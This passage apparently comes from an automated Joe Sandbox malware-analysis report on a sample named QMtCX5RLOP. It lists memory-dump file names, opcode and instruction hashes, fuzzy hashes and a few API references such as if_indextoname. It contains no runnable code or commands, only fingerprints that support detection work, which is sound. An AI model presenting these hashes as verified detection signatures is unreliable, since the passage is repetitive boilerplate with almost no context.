• Associated: 00000000.00000002.1828899097.0000000000D40000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1828916428.00000000012B1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1828916428.0000000001417000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1828916428.0000000001419000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829378215.000000000141C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829393534.000000000141E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829393534.000000000159B000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829393534.00000000016B5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829393534.00000000016B8000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829393534.0000000001796000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829393534.000000000179E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829393534.00000000017AC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829680681.00000000017AD000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829790519.0000000001965000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d40000_QMtCX5RLOP.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 00153a8f352090a5c131aacf98156729f4f71c685601877d745d3eb8eebed1bf
• Instruction ID: 767da0f44c42694e310ebb66085227f9076b51b71895fb6ca5c10f0e3f8d66e4
• Opcode Fuzzy Hash: 00153a8f352090a5c131aacf98156729f4f71c685601877d745d3eb8eebed1bf
• Instruction Fuzzy Hash: 1F710472A08715CBCB109F18C8A076AB7E1EF85328F59876DE9D84B385D339F950CB81
Memory Dump Source
• Source File: 00000000.00000002.1828916428.0000000000D41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true
• Associated: 00000000.00000002.1828899097.0000000000D40000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1828916428.00000000012B1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1828916428.0000000001417000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1828916428.0000000001419000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829378215.000000000141C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829393534.000000000141E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829393534.000000000159B000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829393534.00000000016B5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829393534.00000000016B8000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829393534.0000000001796000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829393534.000000000179E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829393534.00000000017AC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829680681.00000000017AD000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829790519.0000000001965000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d40000_QMtCX5RLOP.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f7d476911229351cbc1840cbd9935b093ce8ba7f64ad79383bd561ff03e38a7a
• Instruction ID: b58ad74ba5f182e7bd2f5394d0ee1d9d3a003f38575b1fc63f277589a7f7079c
• Opcode Fuzzy Hash: f7d476911229351cbc1840cbd9935b093ce8ba7f64ad79383bd561ff03e38a7a
• Instruction Fuzzy Hash: 29810A72D14B828BD3158FA8C8906BABBE0FFDA314F54475EE9D606B83E7749281C741
Memory Dump Source
• Source File: 00000000.00000002.1828916428.0000000000D41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true
• Associated: 00000000.00000002.1828899097.0000000000D40000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1828916428.00000000012B1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1828916428.0000000001417000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1828916428.0000000001419000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829378215.000000000141C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829393534.000000000141E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829393534.000000000159B000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829393534.00000000016B5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829393534.00000000016B8000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829393534.0000000001796000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829393534.000000000179E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829393534.00000000017AC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829680681.00000000017AD000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829790519.0000000001965000.00000040.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d40000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1828916428.0000000000D41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d40000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000003.1809498522.0000000000880000.00000004.00000020.00020000.00000000.sdmp, Offset: 00873000, based on PE: false
                                                            • Associated: 00000000.00000003.1809473978.0000000000873000.00000004.00000020.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_3_873000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000003.1809498522.0000000000880000.00000004.00000020.00020000.00000000.sdmp, Offset: 00883000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_3_873000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000003.1809498522.0000000000880000.00000004.00000020.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_3_873000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1828916428.0000000000D41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d40000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1828916428.0000000000D41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d40000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1828916428.0000000000D41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d40000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: [
                                                            • API String ID: 0-784033777
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1828916428.0000000000D41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d40000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: islower
                                                            • String ID: $
                                                            • API String ID: 3326879001-3993045852
                                                            APIs
                                                            • if_indextoname.IPHLPAPI(C484002E,C483FFEB), ref: 00DF42FA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1828916428.0000000000D41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d40000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: if_indextoname
                                                            • String ID: %$%lu
                                                            • API String ID: 1170979652-938625555